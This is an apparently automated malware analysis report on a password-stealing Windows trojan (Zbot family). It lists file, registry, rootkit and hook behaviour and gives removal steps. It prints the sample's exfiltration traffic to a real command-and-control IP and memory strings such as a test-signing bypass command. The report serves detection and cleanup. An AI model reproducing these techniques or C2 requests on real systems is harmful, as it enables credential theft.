HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.1604712 (B) (Emsisoft), Trojan.GenericKD.1604712 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: ef5b3f90776d64055a927ff0980abedd
SHA1: d297e1dda2be39da75d6e2972dd51a6e9278aac7
SHA256: f8c826eda75e5d406fc6f06a13836d2b127dae4a2e91d8b4e862c8fd34a7e7b3
SSDeep: 192:0aWjyh/fBFJtS/liOhMwb5QRLjMR /vJ8vXkghW3USoQkC4duC8ffbQSEyw:YyheNitu2RLjpH9ghe91kCh0SE1
Size: 20636 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-01-27 22:38:07
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. A Trojan program intended for stealing users' passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
tasklist.exe:1716
reg.exe:272
attrib.exe:2092
driverquery.exe:3648
systeminfo.exe:3828
makecab.exe:3932
fmpal.exe:2112
uhahbe.exe:2180
pdf_updater.exe:2844
dmpal.exe:3388
The Trojan-PSW injects its code into the following process(es):
uhahbe.exe:1760
Explorer.EXE:1948
File activity
The process tasklist.exe:1716 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (119500 bytes)
The process reg.exe:272 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (3240059 bytes)
The process driverquery.exe:3648 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (416527 bytes)
The process systeminfo.exe:3828 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (352446 bytes)
The process makecab.exe:3932 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~2.tmp (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)
The Trojan-PSW deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cab11 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab7 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab8 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab10 (0 bytes)
The process fmpal.exe:2112 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\PVU5D3E.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Iwibs\uhahbe.exe (3573 bytes)
The process uhahbe.exe:1760 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%System%\drivers\d46dd.sys (745 bytes)
%Documents and Settings%\%current user%\ntuser.dat.LOG (9960 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (8076 bytes)
The process pdf_updater.exe:2844 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\1203a[1].ton (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fmpal.exe (1781 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\13003UKp[1].ton (1760 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dmpal.exe (1733 bytes)
The process dmpal.exe:3388 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%WinDir%\client.dll (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\855375.cmd (105 bytes)
%WinDir%\aplib64.dll (12 bytes)
%WinDir%\aplib.dll (11 bytes)
%WinDir%\zlib1.dll (59 bytes)
The Trojan-PSW deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (0 bytes)
Registry activity
The process tasklist.exe:1716 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 B6 6D 06 47 95 10 9E F2 B0 EA 42 66 EE 8B 6E"
The process reg.exe:272 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 A9 44 F9 69 B7 10 82 1C 03 D0 FB 96 BB 76 61"
The process attrib.exe:2092 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 21 10 71 02 BB 73 93 80 2B C5 DA 75 CD D2 D1"
The process driverquery.exe:3648 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 2F 24 76 DD 70 1A A8 56 21 1C 09 CE A1 D4 4C"
The process systeminfo.exe:3828 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 C8 E3 93 E9 B3 4F 23 F8 96 73 12 B5 9D 4D 1F"
The process makecab.exe:3932 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 75 D5 97 10 86 69 BA 29 39 03 0F E8 DC 6C 9C"
The process fmpal.exe:2112 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 B4 58 F7 2E B7 18 59 90 B4 22 5B 73 D3 7B 32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process uhahbe.exe:1760 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 02 8C F9 21 59 4C 58 77 BC 1A 7E BC BF 1B DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Ugywyfo]
"28abe2je" = "iq70ApAFMC83GtWmy4TVKg==("
The process pdf_updater.exe:2844 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"dmpal.exe" = "dmpal"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"fmpal.exe" = "fmpal"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 0C 7C B2 45 93 B3 DA E0 64 C4 BD B9 3D A6 6B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process dmpal.exe:3388 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B F6 FA 70 EF DE 3F 0C 80 9C 79 CE 45 EF 6B 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"
The Trojan-PSW modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan-PSW modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To run itself automatically each time Windows boots, the Trojan-PSW adds the following link to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dumpprov" = "rundll32 %WinDir%\client.dll,CreateProcessNotify"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
02177948855c3cdf6a8e23d13160228f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\pdf_updater.exe |
7fe2b0b3fc2078130f20070a05daf8d5 | c:\WINDOWS\aplib.dll |
3f4fe60b6d1e05144f6efa098ac381a8 | c:\WINDOWS\aplib64.dll |
35c7b7eebe35bc4db0d01965b1193823 | c:\WINDOWS\client.dll |
80e41408f6d641dc1c0f5353a0cc8125 | c:\WINDOWS\zlib1.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\Drivers\b68915e210e9ddd0.sys", the Trojan-PSW monitors the loading of executable images into memory by installing a load-image notify routine.
Using the driver "%System%\Drivers\b68915e210e9ddd0.sys", the Trojan-PSW monitors system registry operations by installing a registry notify routine.
The Trojan-PSW installs the following kernel-mode hooks:
ZwOpenProcess
ZwOpenThread
The Trojan-PSW installs the following user-mode hooks in WININET.dll:
HttpSendRequestExW
HttpSendRequestExA
InternetWriteFile
InternetReadFileExA
InternetReadFileExW
HttpSendRequestA
HttpSendRequestW
InternetQueryDataAvailable
HttpQueryInfoW
InternetCloseHandle
HttpQueryInfoA
InternetReadFile
The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan-PSW installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan-PSW installs the following user-mode hooks in Secur32.dll:
UnsealMessage
SealMessage
DeleteSecurityContext
The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan-PSW installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
tasklist.exe:1716
reg.exe:272
attrib.exe:2092
driverquery.exe:3648
systeminfo.exe:3828
makecab.exe:3932
fmpal.exe:2112
uhahbe.exe:2180
pdf_updater.exe:2844
dmpal.exe:3388
- Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%Documents and Settings%\%current user%\Local Settings\Temp\_1.tmp (119500 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~2.tmp (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (4669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\PVU5D3E.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Iwibs\uhahbe.exe (3573 bytes)
%System%\drivers\d46dd.sys (745 bytes)
%Documents and Settings%\%current user%\ntuser.dat.LOG (9960 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (8076 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\1203a[1].ton (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fmpal.exe (1781 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\13003UKp[1].ton (1760 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dmpal.exe (1733 bytes)
%WinDir%\client.dll (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\855375.cmd (105 bytes)
%WinDir%\aplib64.dll (12 bytes)
%WinDir%\aplib.dll (11 bytes)
%WinDir%\zlib1.dll (59 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dumpprov" = "rundll32 %WinDir%\client.dll,CreateProcessNotify"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 2978 | 3072 | 4.12195 | 667b2e43928b7b4f7997d3771ee35279 |
.data | 8192 | 5048 | 5120 | 4.01903 | 3bb690ef3f51cc08743db079d31031df |
.rsrc | 16384 | 10872 | 11264 | 3.09276 | 4ade1c0dc38342fa47a24dd94bab4ec8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://95.211.192.195/tasks?version=111&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0 | |
hxxp://95.211.192.195/data?version=1011&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0&type=8 | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /tasks?version=111&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0 HTTP/1.1
User-Agent: Microsoft-CryptoAPI/6.1
Host: 95.211.192.195
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 30 Apr 2014 17:46:58 GMT
Content-Type: text/html; charset=utf8
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....
POST /data?version=1011&group=0313a&client=273076e36ee6390d08c77a91bceb4e55&computer=XP2&os=5.1&latency=0.0&type=8 HTTP/1.1
User-Agent: Microsoft-CryptoAPI/6.1
Host: 95.211.192.195
Content-Length: 11642
Connection: Keep-Alive
Cache-Control: no-cache
[Binary POST body, 11642 bytes (per Content-Length): a Microsoft Cabinet archive ("MSCF" header) containing the file _1.tmp. Non-printable bytes were rendered as dots in the capture and are not reproduced here.]
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 30 Apr 2014 17:47:54 GMT
Content-Type: text/html; charset=utf8
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>......
Map
Strings from Dumps
uhahbe.exe_1760:
.text
`.data
.idata
@.reloc
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
0123456789
:$:,:4:<
cRt.1
@[.cZ
http://www.google.com/
http://www.bing.com/
REPORT
bcdfghjklmnpqrstvwxzRegDeleteKeyExW
HTTP/1.1
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
gdiplus.dll
GdiplusShutdown
%3<8645=
7! *.gagZce{(#--2{}s %%;wdX
6019>6*//
0*18 2$4
! <47.ggt?45
L$Â$
w%fkN
m9.td
t.Ht$HHt
zcÁ
GetKeyboardState
MsgWaitForMultipleObjects
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
PathIsURLW
UrlUnescapeA
SHLWAPI.dll
ShellExecuteW
Secur32.dll
ole32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
6f6F6S6b6l6
2#3(3]3{3
0 0,000<0@0\0`0
urlmon.dll
kernel32.dll
\StringFileInfo\xx\%s
Wadvapi32.dll
cabinet.dll
rapport
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
D"%s"
"%s" %s
/c "%s"
E.tmp
shell32.dll
%Documents and Settings%\%current user%\Local Settings\Temp
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}
uhahbe.exe_1760_rwx_00401000_0006D000:
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
0123456789
:$:,:4:<
cRt.1
@[.cZ
http://www.google.com/
http://www.bing.com/
REPORT
bcdfghjklmnpqrstvwxzRegDeleteKeyExW
HTTP/1.1
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
gdiplus.dll
GdiplusShutdown
%3<8645=
7! *.gagZce{(#--2{}s %%;wdX
6019>6*//
0*18 2$4
! <47.ggt?45
L$Â$
w%fkN
m9.td
t.Ht$HHt
zcÁ
GetKeyboardState
MsgWaitForMultipleObjects
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
PathIsURLW
UrlUnescapeA
SHLWAPI.dll
ShellExecuteW
Secur32.dll
ole32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
6f6F6S6b6l6
2#3(3]3{3
0 0,000<0@0\0`0
urlmon.dll
kernel32.dll
\StringFileInfo\xx\%s
Wadvapi32.dll
cabinet.dll
rapport
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
D"%s"
"%s" %s
/c "%s"
E.tmp
shell32.dll
%Documents and Settings%\%current user%\Local Settings\Temp
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}
uhahbe.exe_1760_rwx_00BD0000_00006000:
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
uhahbe.exe_1760_rwx_00BE0000_0006E000:
.text
`.data
.idata
@.reloc
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
0123456789
:$:,:4:<
cRt.1
@[.cZ
http://www.google.com/
http://www.bing.com/
REPORT
bcdfghjklmnpqrstvwxzRegDeleteKeyExW
HTTP/1.1
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
gdiplus.dll
GdiplusShutdown
%3<8645=
7! *.gagZce{(#--2{}s %%;wdX
6019>6*//
0*18 2$4
! <47.ggt?45
L$Â$
w%fkN
m9.td
t.Ht$HHt
zcÁ
GetKeyboardState
MsgWaitForMultipleObjects
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
PathIsURLW
UrlUnescapeA
SHLWAPI.dll
ShellExecuteW
Secur32.dll
ole32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
6f6F6S6b6l6
2#3(3]3{3
0 0,000<0@0\0`0
urlmon.dll
kernel32.dll
\StringFileInfo\xx\%s
Wadvapi32.dll
cabinet.dll
rapport
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
"%s" %s
/c "%s"
shell32.dll
%Documents and Settings%\%current user%\Local Settings\Temp
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}
Explorer.EXE_1948_rwx_02470000_0006E000:
.text
`.data
.idata
@.reloc
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
0123456789
:$:,:4:<
cRt.1
@[.cZ
http://www.google.com/
http://www.bing.com/
REPORT
bcdfghjklmnpqrstvwxzRegDeleteKeyExW
HTTP/1.1
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
gdiplus.dll
GdiplusShutdown
%3<8645=
7! *.gagZce{(#--2{}s %%;wdX
6019>6*//
0*18 2$4
! <47.ggt?45
L$Â$
w%fkN
m9.td
t.Ht$HHt
zcÁ
GetKeyboardState
MsgWaitForMultipleObjects
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
PathIsURLW
UrlUnescapeA
SHLWAPI.dll
ShellExecuteW
Secur32.dll
ole32.dll
WS2_32.dll
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
PFXImportCertStore
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
6f6F6S6b6l6
2#3(3]3{3
0 0,000<0@0\0`0
urlmon.dll
kernel32.dll
\StringFileInfo\xx\%s
Wadvapi32.dll
cabinet.dll
rapport
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
"%s" %s
/c "%s"
shell32.dll
%Documents and Settings%\%current user%\Local Settings\Temp
%Documents and Settings%\%current user%\Local Settings\Application Data
